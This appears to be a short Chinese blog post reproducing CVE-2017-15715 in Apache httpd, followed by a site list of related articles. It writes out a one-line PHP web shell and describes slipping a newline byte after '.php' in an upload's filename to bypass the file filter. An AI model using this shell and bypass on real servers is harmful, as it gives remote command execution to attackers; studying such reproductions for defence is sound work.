Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
wenzhangli77 小时前
OoderAgent SDK(0.6.6) UDP通讯与协议测试深度解析
网络·网络协议·udp
安科士andxe8 小时前
60km 远距离通信新选择:AndXe SFP-155M 单模单纤光模块深度测评
网络·信息与通信
酥暮沐8 小时前
iscsi部署网络存储
linux·网络·存储·iscsi
darkb1rd9 小时前
四、PHP文件包含漏洞深度解析
网络·安全·php
哆啦code梦9 小时前
2024 OWASP十大安全威胁解析
安全·系统安全·owasp top 10
迎仔9 小时前
02-网络硬件设备详解:从大喇叭到算力工厂的进化
网络·智能路由器
嘿起屁儿整10 小时前
面试点(网络层面)
前端·网络
serve the people10 小时前
python环境搭建 (十二) pydantic和pydantic-settings类型验证与解析
java·网络·python
_运维那些事儿10 小时前
VM环境的CI/CD
linux·运维·网络·阿里云·ci/cd·docker·云计算
云小逸10 小时前
【nmap源码学习】 Nmap网络扫描工具深度解析:从基础参数到核心扫描逻辑
网络·数据库·学习